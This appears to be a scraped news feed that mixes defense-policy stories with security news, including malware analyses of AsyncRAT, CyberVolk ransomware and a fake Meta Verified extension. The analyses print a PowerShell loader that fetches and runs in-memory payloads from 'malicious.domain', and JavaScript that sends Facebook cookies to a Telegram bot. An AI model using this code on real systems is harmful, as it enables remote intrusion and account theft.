1010.cx

  • Fight AI-powered cyber attacks with AI tools, intelligence leaders say

    ·

    Cyber defenders need AI tools to fend off a new generation of AI-powered attacks, the head of the National Geospatial-Intelligence Agency said Wednesday.

    “The concept of using AI to combat AI attack or something like that is very real to us. So this, again, is commanders’ business. You need to enable your [chief information security officer] with the tools that he or she needs in order to employ AI to properly handle AI-generated threats,” Vice Adm. Frank Whitworth said at the Billington Cybersecurity Summit Wednesday.

    Artificial intelligence has reshaped cyber, making it easier for hackers to manipulate data and craft more convincing fraud campaigns, like phishing emails used in ransomware attacks. 

    Whitworth spoke a day after Sean Cairncross, the White House’s new national cyber director, called for a “whole-of-nation” approach to ward off foreign-based cyberattacks. 

    “Engagement and increased involvement with the private sector is necessary for our success," Cairncross said Tuesday at the event. “I’m committed to marshalling a unified, whole-of-nation approach on this, working in lockstep with our allies who share our commitment to democratic values, privacy and liberty…Together, we’ll explore concepts of operation to enable our extremely capable private sector, from exposing malign actions to shifting adversaries’ risk calculus and bolstering resilience."

    The Pentagon has been incorporating AI, from administrative tasks to combat. The NGA has long used it to spot and predict threats; use of its signature Maven platform has doubled since January and quadrupled since March 2024. 

    But the agency is also using “good old-fashioned automation” to more quickly make the military’s maps. 

    “This year, we were able to produce 7,500 maps of the area involving Latin America and a little bit of Central America…that would have been 7.5 years of work, and we did it in 7.5 weeks,” Whitworth said. “Sometimes just good old-fashioned automation, better practices of using automation, it helps you achieve some of the speed, the velocity that we're looking for.”

    The military’s top officer also stressed the importance of using advanced tech to monitor and preempt modern threats.

    “There's always risk of unintended escalation, and that's what's so important about using advanced tech tools to understand the environment that we're operating in and to help leaders see and sense the risk that we're facing. And there's really no shortage of those risks right now,” said Gen. Dan Caine, chairman of the Joint Chiefs of Staff, who has an extensive background in irregular warfare and special operations, which can lean heavily on cutting-edge technologies. 

    “The fight is now centered in many ways around our ability to harvest all of the available information, put it into an appropriate data set, stack stuff on top of it—APIs and others—and end up with a single pane of glass that allows commanders at every echelon…to see that, those data bits at the time and place that we need to to be able to make smart tactical, operational and strategic decisions that will allow us to win and dominate on the battlefields of the future. And so AI is a big part of that,” Caine said. 

    The Pentagon recently awarded $200 million in AI contracts while the Army doubled down on its partnership with Palantir with a decade-long contract potentially worth $10 billion. The Pentagon has also curbed development of its primary AI platform, Advana, and slashed staff in its chief data and AI office with plans of a reorganization that promises to “accelerate Department-wide AI transformation” and make the Defense Department “an AI-first enterprise.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cursor AI Code Editor RCE Vulnerability Enables “autorun” of Malicious on your Machine

    ·

    , , ,

    A remote code execution vulnerability has been discovered in the Cursor AI Code Editor, enabling a malicious code repository to run code on a user’s machine upon opening automatically.

    The research team at Oasis Security uncovered the flaw, which bypasses typical user consent prompts by exploiting a default configuration setting in the popular editor.

    According to Oasis Security, the core of the vulnerability lies in Cursor shipping with its “Workspace Trust” feature disabled by default. This security setting, present in VS Code, is designed to prevent untrusted code from executing automatically.

    With this feature off, an attacker can craft a malicious code repository containing a specially configured .vscode/tasks.json file. By setting the runOptions.runOn parameter to “folderOpen”, any commands within this task file will execute the moment a developer opens the project folder in Cursor.

    Cursor AI Code Editor RCE Vulnerability

    This transforms a seemingly harmless action into silent code execution within the user’s security context, without any warning or prompt for trust. An attacker can leverage this to steal sensitive information, modify local files, or establish a connection to a command-and-control server.

    This vulnerability poses a significant risk because developer machines are often treasure troves of high-privilege credentials. Compromising a developer’s laptop can give an attacker immediate access to cloud API keys, Personal Access Tokens (PATs), and active SaaS sessions.

    The danger extends beyond the individual machine; with an initial foothold, an attacker can pivot to connected CI/CD pipelines and cloud infrastructure.

    This lateral movement is especially concerning as it can lead to the compromise of non-human identities, such as service accounts, which often possess broad and powerful permissions across an organization’s environment. A single booby-trapped repository could initiate a widespread security incident.

    Cursor users running the default configuration are directly affected by this vulnerability. In contrast, standard Visual Studio Code users with Workspace Trust enabled are at a lower risk, as the feature blocks automatic task execution until the user explicitly grants trust to the project folder.

    In response to the disclosure, Cursor has stated that users can manually enable Workspace Trust and that updated security guidance will be published soon.

    Oasis Security has provided immediate hardening recommendations for development teams. Users should enable Workspace Trust in Cursor, require the startup prompt, and consider setting the task.allowAutomaticTasks preference to “off”.

    It is also advised to open all unknown repositories in a secure, isolated environment, such as a disposable container or virtual machine, to prevent potential execution.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Cursor AI Code Editor RCE Vulnerability Enables “autorun” of Malicious on your Machine appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • You may not be interested in climate change, but it is interested in you

    ·

    The word Defense in the name of the government agency now dubbed the Department of War invited “bureaucratic mission creep”—or so argues a Washington Post editorial that points to the nineteen mentions of “climate” in the 2022 National Defense Strategy. The op-ed suggests that previous administrations made fighting climate change “the military’s job” at the expense of its traditional focus on deterring conflict and, when necessary, winning wars. Nothing could be further from the truth.

    Both of us worked on strategy and climate security matters in the Office of the Secretary of Defense, so we are well-positioned to articulate how and why the Department’s focus on climate change has grown over the years, across administrations of both parties. The simple fact is that climate change poses enormous challenges for the American military. If the Department does not continue adapting to climate-related threats, it will face extraordinary new costs, which it will pay in billions of dollars, in warfighting readiness, and, ultimately, in the lives of American service members.

    To illustrate, in 2018 and 2019, the Department sustained more than $10 billion in damages at Tyndall Air Force Base, Camp Lejeune, and Offutt Air Force Base as the result of climate-driven storms. In the 2018 National Defense Authorization Act, Congress required the Department to scrutinize the military’s vulnerabilities to wildfires, floods, hurricanes, and sea-level rise; the consequent report gave rise to new predictive tools to foresee and mitigate the effects of climate hazards on defense installations. 

    The 2022 NDS reflected this hard experience, as well as hard science: “Increasing temperatures, changing precipitation patterns, rising sea levels, and more frequent extreme weather conditions will affect basing and access while degrading readiness, installations, and capabilities.” To address these concerns, the NDS directed the Department to strengthen its “ability to withstand and recover quickly from climate events.” The climate and weather monitoring tools that the Department relies on are now being dismantled to score political points. That means more risk—for installations, for military platform performance, and for individual service members, many of whose readiness and wellbeing are already being compromised by the increase in “black flag days,” when temperatures are too hot to train. 

    Climate change also figures heavily in the NDS because the military is increasingly called upon to deal with it—by state and local authorities who need help responding to climate-driven disasters. The number of personnel days the National Guard dedicated to fighting wildfires increased from 14,000 in 2016 to 176,000 in 2021, and have since continued to rise. As we wrote in the NDS, climate change “will increase demands, including on the Joint Force, for disaster response and defense support of civil authorities.” These new requirements mean that our soldiers are not training for core national-security tasks like preparing for war or, as this administration has decided, picking up trash in our nation’s capital. And such requirements are likely to accelerate with the pending demise of the Federal Emergency Management Agency.

    Indeed, climate change is reshaping the very map of the world—“creating new corridors of strategic interaction, particularly in the Arctic region,” as the NDS put it. Melting sea ice is creating new possibilities for navigation and resource exploitation, which is leading to more Russian and Chinese military operations along the Alaskan coastline. To accomplish its homeland-defense mission, the Department must closely monitor both the changing geophysical context as well as the shifting geopolitical environment. 

    There are many additional reasons the Department should be thinking intently about the implications of climate change, but the last one we’ll mention is the likelihood that global warming will spur a massive increase in migration, which is ostensibly a primary concern of the Trump administration. Scholars have identified drought as a key causal factor in the Syrian civil war, which led millions to seek refuge in Europe. As the NDS stated, and experience has since validated, “Insecurity and instability related to climate change may tax governance capacity in some countries while heightening tensions between others, risking new armed conflicts and increasing demands for stabilization activities.”

    We agree with the Trump administration that fighting climate change should not be the primary focus of our national-security establishment. No credible defense strategist has ever argued that should be the case. However, all Americans should want our military to integrate consideration of climate change into its planning and operations so it can achieve its mandate of defending against threats to the American people. Failure to plan for operating conditions that are changing fundamentally would be a colossal strategic mistake. 

    The Department of Defense was increasingly prepared for all threats. The Department of War might prepare for a far narrower set. If so, we will all come to regret it.

    Dr. Josh Busby is a Professor at the University of Texas who served as a senior climate advisor within the Office of the Secretary of Defense from 2021-2023. His core responsibility was integrating the effects of climate change on the military, and how DoD might build resilience to them, into the 2022 NDS. 

    Greg Pollock is an Adjunct Professor at Georgetown University who served in a series of leadership positions in the Office of the Secretary of Defense from 2010-2025, most recently as the acting deputy assistant secretary of defense for the Arctic and Global Resilience. 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Jaguar Land Rover Confirms Hackers Stole Data in Ongoing Cyberattack

    ·

    , , ,

    Jaguar Land Rover (JLR) has confirmed that data was stolen during a major cyberattack that has crippled its global operations, bringing vehicle production to a standstill since early September.

    The luxury carmaker, a subsidiary of India’s Tata Motors, is now working with cybersecurity specialists to investigate the breach and restore its systems.

    The cyber incident, first disclosed on September 2, 2025, prompted JLR to shut down its IT systems as a precautionary measure, which severely disrupted its manufacturing and sales operations.

    The shutdown has halted production at its key UK facilities in Solihull, Halewood, and Wolverhampton, stopping the assembly of approximately 1,000 vehicles per day. The disruption extends globally, affecting factories in Slovakia and India, as well as dealer sales, vehicle handovers, and the ordering of parts.

    Initially, JLR stated there was no evidence that customer data had been compromised. However, in a statement released on September 10, the company revised its assessment, admitting that its ongoing investigation revealed “some data has been affected”.

    While JLR has not specified whether the compromised data belongs to customers, employees, or the company itself, it has notified the UK’s Information Commissioner’s Office (ICO) and other relevant regulators.

    A JLR spokesperson stated, “Since we became aware of the cyber incident, we have been working around the clock, alongside third-party cybersecurity specialists, to restart our global applications in a controlled and safe manner”.

    The company has assured that its “forensic investigation continues at pace” and that it will contact anyone whose data is found to be impacted.

    The attack has caused significant concern, with UK government officials reportedly worried about the economic fallout from the prolonged shutdown, which is expected to last for weeks.

    A hacking group known as “Scattered Lus$,” previously linked to attacks on other UK retailers, has reportedly claimed responsibility for the breach.

    JLR continues to manage the crisis, with the majority of its production workers being told not to return to work as the company assesses the situation daily. The carmaker has apologized for the ongoing disruption caused by the incident.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Jaguar Land Rover Confirms Hackers Stole Data in Ongoing Cyberattack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions

    ·

    , ,

    CyberVolk ransomware first emerged in May 2024, rapidly evolving into a sophisticated threat aimed at government agencies and critical infrastructure in countries perceived as hostile to Russian interests.

    Leveraging a dual-layer symmetric encryption process, this malware has inflicted significant operational disruptions on scientific institutions and public services across Japan, France, and the United Kingdom.

    The group behind the attacks communicates exclusively via Telegram, issuing demands of $20,000 in Bitcoin and warning that any attempt to recover encrypted files will result in data destruction.

    Initial infection typically occurs through targeted phishing campaigns or compromised administrative credentials, allowing the ransomware to execute under standard user privileges before relaunching with elevated rights.

    ASEC analysts identified that once administrative access is obtained, the malware systematically excludes system-critical directories and files by matching predefined path strings such as “Windows” and “Program Files”.

    CyberVolk execution flow (Source – ASEC)

    This exclusion ensures that essential system components remain intact, preventing unintended system crashes that could thwart ransom negotiations.

    ASEC researchers noted the malware’s unique double-encryption structure, combining AES-256 in GCM mode with ChaCha20-Poly1305 to secure each file.

    A 12-byte random nonce is generated for every encryption operation, but critically, this nonce is not preserved in the encrypted file’s metadata, rendering decryption virtually impossible without the original key.

    Once encryption concludes, CyberVolk creates a ransom note named READMENOW.txt in the affected directory, instructing victims on payment and decryption procedures.

    Generated ransom note (Source – ASEC)

    Despite its technical sophistication, CyberVolk ransomware exhibits a deliberate flaw in its decryption routine.

    When victims enter the supplied decryption key, the malware attempts to decrypt the ChaCha20-Poly1305 layer using an incorrect nonce, causing the process to fail even with a valid key.

    Camouflage decryption progress (Source – ASEC)

    This “camouflage decryption” tactic misleads victims into believing they can recover data through payment, while in reality, the absence of the original nonce makes recovery unfeasible.

    Infection Mechanism Deep Dive

    Upon execution, CyberVolk checks its privileges and, if necessary, triggers a privilege escalation routine to gain administrator rights.

    It then enumerates files across all local drives, filtering out paths containing substrings defined in an exclusion table.

    The core encryption routine reads each file into memory and invokes the Go-based crypto_aes_NewCipher function followed by crypto_cipher_NewGCM to perform AES-256 GCM encryption:-

    v15 = crypto_aes_NewCipher(keyPtr, 32, 32, 0, a5, ...)
v76 = crypto_cipher_NewGCM(v15, 32, ..., a5, ...)
nonce := make([]byte, v76.NonceSize())
crypto_rand_Read(nonce, v76.NonceSize(), ...)
ciphertext := v76.Seal(nil, nonce, fileData, nil)

    This ciphertext is subsequently wrapped with ChaCha20-Poly1305, producing a compact payload consisting solely of encrypted data and an authentication tag.

    By omitting the nonce in the stored payload, the developers guarantee that only they can perform valid decryption—though their own flawed implementation prevents even them from restoring files without manual nonce management.

    The tailored infection routine, combined with sophisticated encryption layers and deliberate recovery flaws, underscores CyberVolk’s intent to maximize operational impact and victim uncertainty.

    Organizations must implement off-site backups, restrict administrative access, and conduct regular recovery drills to mitigate such threats.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access

    ·

    , ,

    Security researchers have recently observed a surge in sophisticated fileless malware campaigns targeting enterprise environments.

    AsyncRAT, a powerful Remote Access Trojan, leverages legitimate system tools to execute malicious payloads entirely in memory, effectively sidestepping traditional disk-based defenses.

    Emergence of this threat underscores the evolving tactics employed by cyber adversaries to maintain stealth and persistence on compromised systems.

    Initial access in the majority of these attacks is achieved through compromised remote support software. Intruders exploit unauthorized ScreenConnect deployments, gaining interactive control over victim machines.

    Once inside, they deploy a multi-stage loader written in VBScript. LevelBlue analysts noted that this loader retrieves two encoded payloads—logs.ldk and logs.ldr—from attacker-controlled servers.

    These payloads are never written to disk; instead, they are reflected directly into memory, converting raw byte arrays into executable code at runtime.

    AsyncRAT’s architecture revolves around modular .NET assemblies designed for both evasion and core RAT functionality.

    LevelBlue researchers identified three principal classes within the first-stage DLL: an entry-point initializer, a persistence manager that creates scheduled tasks disguised as legitimate updaters, and an anti-analysis component that patches AMSI and ETW hooks to disable Windows security logging.

    Through dynamic API resolution and in-memory loading, the malware maximizes stealth and complicates forensic analysis.

    Beyond obfuscation, AsyncRAT’s second stage—AsyncClient.exe—serves as the command-and-control engine.

    Encrypted configuration data within the binary specifies C2 domains, ports, infection flags, and target directories.

    Upon decryption with AES-256, the client establishes a TCP socket to its control server, exchanging length-prefixed MessagePack packets.

    This protocol supports reconnaissance commands, data exfiltration routines, and remote execution of attacker-supplied instructions.

    Infection Mechanism

    AsyncRAT’s infection mechanism begins with the execution of a simple VBScript, Update.vbs, launched through WScript.exe.

    The script employs the following PowerShell snippet to fetch and execute the loader:

    $urls = @("http://malicious.domain/logs.ldk","http://malicious.domain/logs.ldr")
foreach ($u in $urls) {
    $bytes = (New-Object Net.WebClient).DownloadData($u)
    [Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
}

    This concise loader carries out two critical functions: it decrypts the downloaded binaries and invokes their entry points entirely in memory, leaving no forensic footprint on disk.

    By chaining reflection-based loading with anti-analysis routines in the Obfuscator.dll, the attacker ensures that each stage remains hidden from endpoint detection tools.

    Subsequent control is handed off to AsyncClient.exe, which maintains persistence and enables full remote administration of the host.

    Through this fileless approach, AsyncRAT demonstrates how modern malware can blend legitimate scripting platforms with advanced evasion tactics to compromise and control targeted systems seamlessly.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

    ·

    , ,

    Malicious actors have launched a sophisticated malvertising campaign on Facebook that coerces unsuspecting users into installing a fake “Meta Verified” browser extension.

    Promoted through seemingly legitimate video tutorials, these ads promise to unlock the coveted blue verification tick without paying Meta’s subscription fee.

    In reality, the extension is engineered to harvest sensitive user data, including session cookies, access tokens, and IP addresses.

    By leveraging trusted platforms like Box.com for hosting, attackers ensure high availability and evade simple URL-blocking defenses, making the scam appear both authentic and risk-free.

    Upon closer inspection, the video tutorials accompanying the ads bear the fingerprints of Vietnamese-speaking threat actors, with narration and code comments written in Vietnamese.

    The extension’s code, although clumsily obfuscated and likely generated by an AI-assisted toolkit, still effectively exfiltrates data.

    Bitdefender analysts identified the use of the Facebook Graph API to query Business account information once valid access tokens are acquired, allowing attackers to distinguish high-value corporate profiles from personal accounts.

    Malicious browser extension ad (Source – Bitdefender)

    Victims who follow the tutorial unwittingly grant the extension permissions to read and export cookies from the facebook.com domain.

    Once installed, the extension immediately invokes an exportCookies function that compiles every cookie into a formatted string before transmitting it to a Telegram bot controlled by the attackers.

    Cookie export function (Source – Bitdefender)

    To further personalize the stolen data, the malware queries https://ipinfo.io/json to append geolocation details, bolstering its marketability on underground forums.

    Bitdefender researchers noted that variants of this extension include adjustable parameters for tick size and position, suggesting an automated pipeline for generating new campaign assets with minimal manual effort.

    The modular design also supports automatic execution upon Chrome startup, ensuring persistent data harvesting even if users disable and re-enable the extension.

    Infection Mechanism Deep Dive

    The core of the infection mechanism lies in the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens without triggering user prompts.

    After installation—triggered by clicking on an ad link—the extension uses chrome.cookies.getAll({ domain: "facebook.com" }, callback) to gather cookies.

    Within the callback, it constructs the payload:-

    async function exportCookies() {
  chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
    const cookieString = cookies. Map(c => `${c.name}=${c.value}`).join(";");
    const userId = cookies. Find(c => c.name === "c_user")?.value || "Unknown";
    const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
    const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
    sendToTelegram(payload);
  });
}

    This streamlined approach bypasses many endpoint-based detections, while the use of legitimate domains for hosting and command-and-control reduces the likelihood of rapid takedown.

    Security teams should monitor abnormal cookie export activity and enforce rigorous extension vetting to defend against such industrialized malvertising threats.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Chinese APT Deploys EggStreme Fileless Malware to Breach Philippine Military Systems

    ·

    An advanced persistent threat (APT) group from China has been attributed to the compromise of a Philippines-based military company using a previously undocumented fileless malware framework called EggStreme. “This multi-stage toolset achieves persistent, low-profile espionage by injecting malicious code directly into memory and leveraging DLL sideloading to execute payloads,” Bitdefender

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The D Brief: NATO downs Russian drones; Gulf nations question US; HII’s AI; Speedboat questions linger; And a bit more.

    ·

    NATO officials met in an emergency session after Russian drones were shot down over Poland. The intrusion prompted a rare coordinated shootdown effort by the alliance featuring Polish F-16s, Dutch F-35s, an Italian AWACS aircraft, a NATO aerial tanker, and German Patriot air defense systems, NATO Secretary General Mark Rutte told reporters Wednesday. 

    Moscow’s military used “more than 10 Russian Shahed drones” in the incident, which European Union Commission President Ursula von der Layen described as “a reckless and unprecedented violation of Poland and Europe's air[s]pace.” 

    Ukrainian President Volodymir Zelenskyy, “In total, at least several dozen Russian drones were moving along the border of Ukraine and Belarus and across western regions of Ukraine, approaching targets on Ukrainian territory and, apparently, on Polish territory,” Zelenskyy wrote on social media. “Our air defense forces destroyed more than 380 Russian drones of various types. At least 250 of them were [Iranian-designed] ‘shaheds.’”

    “This is the first time NATO aircrafts have engaged potential threats in Allied airspace,” the alliance’s military spokesman said in a statement, and noted alliance members are “committed to defending every kilometre of NATO territory, including our airspace.”

    After the intrusions, Poland invoked NATO’s Article 4, which is an agreement to meet among allies when one feels threatened. “A full assessment of the incident is ongoing,” Rutte said, stressing, “What is clear is that the violation last night is not an isolated incident.”

    Rutte’s message to Russia: “Stop violating Allied airspace. And know that we stand ready, that we are vigilant, and that we will defend every inch of NATO territory.”

    POTUS reax: “What’s with Russia violating Poland’s airspace with drones? Here we go!” the U.S. president wrote on social media Wednesday morning, without elaborating. 

    The view from Berlin: This was not “a matter of course correction errors or anything of that sort. These drones were quite obviously deliberately directed on this course,” said German Defense Minister Boris Pistorius. 

    Canada’s prime minister called the incident “reckless and escalatory,” and vowed to “remain vigilant against Russia’s attempts to widen and prolong the conflict with Ukraine.” 

    Even Putin ally Viktor Orban declared Hungary “stands in full solidarity with Poland following the recent drone incident,” and said on social media, “The violation of Poland’s territorial integrity is unacceptable.”

    The U.S. ambassador to NATO threw his support behind the alliance in a short statement and vowed to “defend every inch of NATO territory.” 

    Capitol Hill reax: “The Administration’s policy towards Russia is weak and vacillating, and Putin is taking advantage of it,” said Armed Services Committee member Rep. Don Bacon, R-Illinois, writing Wednesday morning on social media. 

    “An act of war” is how fellow HASC member Rep. Joe Wilson, R-South Carolina, described the incident, writing on social media as well. He added, “I urge President Trump to respond with mandatory sanctions that will bankrupt the Russian war machine and arm Ukraine with weapons capable of striking Russia. Putin is no longer content just losing in Ukraine while bombing mothers and babies, he is now directly testing our resolve in NATO territory.”

    Two senators on the Foreign Relations Committee released a bipartisan statement criticizing President Trump for insufficient pressure on Moscow, writing, “It has been three weeks since President Trump met with Vladimir Putin. Since that time, Putin met with fellow autocrats in Beijing to conspire against America and returned to Moscow to escalate his illegal invasion of Ukraine,” said co-chairs of the Senate NATO Observer Group Jeanne Shaheen, D-New Hampshire, and Thom Tillis, R-North Carolina. “Russia has now launched the largest aerial assault since the invasion began—firing more than 800 drones and missiles, setting Ukraine’s Cabinet of Ministers ablaze and killing civilians, including a mother and her infant.” 

    “At the very moment Putin escalates, the United States appears to be cutting back,” the senators warn, flagging “Programs like Section 333 security cooperation, which includes the Baltic Security Initiative—lifelines for NATO’s eastern flank—[that] are now on the chopping block, even as Europe takes on more of the burden. The message this sends is dangerous: that the United States is pulling back just as the stakes in Ukraine and for NATO’s security are at their highest. Our adversaries are taking note that they can wait out American support—that does not make America safer.” 

    “Putin has shown us time and again that he is a liar and a murderer. He never wanted peace,” said Shaheen and Tillis, who also encouraged the passage of new “legislation that imposes crippling sanctions on Putin’s regime” because “the cost of inaction to America’s security is too high.” 

    Related: Russian officials “are engaging in a top-down Kremlin-organized effort to threaten Finland,” analysts at the Institute for the Study of War wrote in their Tuesday assessment. Moscow’s threats include the allegation that Finland is becoming a “real hotbed of fascism faster than Ukraine” and that “nothing can be ruled out” in terms of a Russian military intervention into Finland, according to Russian State Duma Defense Committee Chairperson Andrei Kartapolov on Tuesday. And that charge came one day after Dmitry Medvedev of Russia’s Security Council threatened Finland with “language that directly mirrored the Kremlin’s false justifications for its invasions of Ukraine,” ISW writes, warning these threats may be used “to justify future Russian aggression against a NATO member state.” 

    Update: Russia is losing fewer troops as its invasion continues to progress across eastern Ukraine, analysts at the Institute for the Study of War wrote in their Tuesday assessment, citing statistics from Ukrainian officials. From May to August, Russia lost about “68 casualties per square kilometer seized,” compared to “an average of 99 casualties per square kilometer gained in January, February, March, and April 2025,” a half-dozen researchers write in ISW’s latest analysis.  

    Behind the downward trend: Russia has changed how it uses drones in support of combat troops on the ground in an effort “largely led by UAV operators of Russia’s Rubikon Center for Advanced Unmanned Technologies,” ISW writes. That organization was established one year ago, but their operations picked up in early 2025 and have been boosted by the growing use of fiber optic aerial drones, which are impervious to jamming by Ukrainian forces along the frontlines. Background: “Russia began to proliferate Rubikon UAV units across the frontline in April and May 2025, and ISW has observed reports of Rubikon units operating in Kursk Oblast and throughout eastern Ukraine from northeastern Kharkiv Oblast to the Velykomykhailivka direction in western Donetsk Oblast.” More, here

    For your ears only: Listen to CNA’s Sam Bendett discuss the Rubikon Center and much more in the latest episode of Defense One Radio: “How drone warfare is changing.” 

    Additional reading: Tanks Were Just Tanks, Until Drones Made Them Change,” the New York Times reported in a curious interactive on Monday. 

    Welcome to this Wednesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1939, the British accidentally sank one of their own submarines near Norway, marking the Brits’ first sub loss of the war. Only two of the 55-man crew survived.  

    Israel’s attack in Qatar

    Gulf nations ask: if U.S. protection can’t stop an attack on Qatar, what good is it? That’s the gist of a New York Times article on the reverberations from Tuesday’s air strike that sought to kill Hamas officials in Doha.

    Key quote: “Qatar being unable to protect its own citizens with literally the U.S. Central Command on its territory has prompted locals to question the value of the American partnership,” said Kristin Diwan, a senior resident scholar at the Arab Gulf States Institute in Washington, a research group. “It’s a real problem for Gulf leaders. And it should worry the United States as well.”

    WH spox: Trump “feels very badly” about the attack. The president learned about the attack from the U.S. military, and told envoy Steve Witkoff to tip off the Qatari government, Karoline Leavitt told reporters Tuesday.  Eliminating Hamas is a "worthy goal," Leavitt read from a prepared statement. “Unilaterally bombing inside Qatar, a sovereign nation and close ally of the United States that is working very hard and bravely taking risks with us to broker peace, does not advance Israel or America's goals.” More from Axios, here.

    NYT has an explainer on the attack, here.

    Around the Defense Department

    No DOW in NDAA. At least one lawmaker has tried and failed to make the Department of War renaming official, reports Reese Gorman of News of the United States. “An amendment introduced to the NDAA that would rename the Department of Defense to the Department of War—which requires an act of Congress—was not found in order by the Rules Committee.”

    News summaries sent to National Guard leaders reflect public “fear” and troops’ “shame” over D.C. deployment, the Washington Post reports off copies of the summaries slipped to them. “Trending videos show residents reacting with alarm and indignation,” one summary, from Friday, said. “One segment features a local [resident] describing the Guard’s presence as leveraging fear, not security — highlighting widespread discomfort with what many perceive as a show of force.” More, here.

    Trump’s DC “emergency” expires at midnight, but it’s not clear what will change in the nation’s capital. New York Times: “The end of the 30-day period has no bearing on the thousands of National Guard troops, drawn from the District of Columbia itself and from eight Republican-led states, who have been deployed to Washington. Neither does it directly affect the hundreds of additional federal law enforcement officers — from the Federal Bureau of Investigation, the Drug Enforcement Administration and other agencies — who have been sent out into the city to patrol. And U.S. Immigration and Customs Enforcement agents will continue to take people into custody around Washington, as they did long before the emergency was declared.” More, here.

    New: Trump’s Pentagon chief spoke to his Chinese counterpart Tuesday, Pete Hegseth’s spokesman announced Wednesday in what to our knowledge is a first for Hegseth. 

    In his phone call with Defense Minister Adm. Dong Jun, “Hegseth made clear that the United States does not seek conflict with China nor is it pursuing regime change or strangulation of the [People’s Republic of China]. At the same time, however, he forthrightly relayed that the U.S. has vital interests in the Asia-Pacific, the priority theater, and will resolutely protect those interests,” the Defense Department said in a short statement. 

    INDOPACOM: “The homeland is in the Pacific.” In a Monday speech, U.S. Indo-Pacific Command leader Adm. Samuel Paparo said he’s not concerned about reports that defending the homeland is the Pentagon’s new top priority. “The Indo-Pacific is the priority theater of the United States of America.” Defense One’s Jennifer Hlad has a bit more from Honolulu, here.

    China is trying to strongarm Palau with soft power. Beijing is deliberately attempting to “erode leadership, disrupt vital services, and weaken confidence in government” in Palau, and has sent drugs to wash ashore on the Pacific nation to “weaken our community,” the country’s president said Monday. Hlad explains how, here.

    Related: “Leaked files show a Chinese company is exporting the Great Firewall’s censorship technology,” reports Toronto’s Globe and Mail.

    China’s submarine buildup, illustrated by the Wall Street Journal: “China is on the verge of becoming a world-class submarine power, with new technology and a bigger, better fleet that is gaining on the U.S. and its allies—spurring a new undersea arms race in the Pacific.” Find that here.

    To keep up, a U.S. sub yard is turning to AI. “By the end of this year, our plan is to have every single person in our manufacturing shops—17 different businesses, basically across 550 acres—doing work based on the output of what AI tells us to go do. At the end of [2026] all of the people working on all of our ships will be directed by what AI tells us to do,” Brian Fields, the chief technology officer for HII’s Newport News Shipbuilding division, said Tuesday. Defense One’s Lauren C. Williams has a bit more, here.

    Speedboat strike

    The Trump administration has sent a War Powers Resolution report to Congress laying out its justification for the deadly Sept. 2 attack on a speedboat in international waters. Quote: “In the face of the inability or unwillingness of some states in the region to address the continuing threat to United States persons and interests emanating from their territories, we have now reached a critical point where we must meet this threat to our citizens and our most vital national interests with United States military force in self-defense.” Read more, via the War Powers Resolution Reporting Project, here.

    Even with this required notice, the attack was unlawful in several ways, writes Marty Lederman,  a professor at the Georgetown University Law Center, in Just Security. “…it’s likely that the President lacked any affirmative domestic authority to order the strike, and the strike itself appears to have violated several legal prohibitions.”

    And the U.S. military broke a bedrock principle. “As I’ll discuss at the end of this piece, regardless of which laws might have been broken, what’s more alarming, and of greater long-term concern, is that U.S. military personnel crossed a fundamental line the Department of Defense has been resolutely committed to upholding for many decades—namely, that (except in rare and extreme circumstances not present here) the military must not use lethal force against civilians, even if they are alleged, or even known, to be violating the law.” Read that, here.

    Related reading: 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Amp’ed RF BT-AP 111 Bluetooth Access Point Vulnerability Let Attackers Gain Full Admin Access

    ·

    ,

    A critical security vulnerability has been discovered in the Amp’ed RF BT-AP 111 Bluetooth Access Point, exposing organizations to significant security risks through an unauthenticated administrative interface.

    The device, which serves as a Bluetooth-to-Ethernet bridge supporting both access point and gateway functionality, lacks fundamental authentication controls on its web-based management system.

    The vulnerability, designated as CVE-2025-9994, allows remote attackers with network access to gain complete administrative control over the device without requiring any credentials.

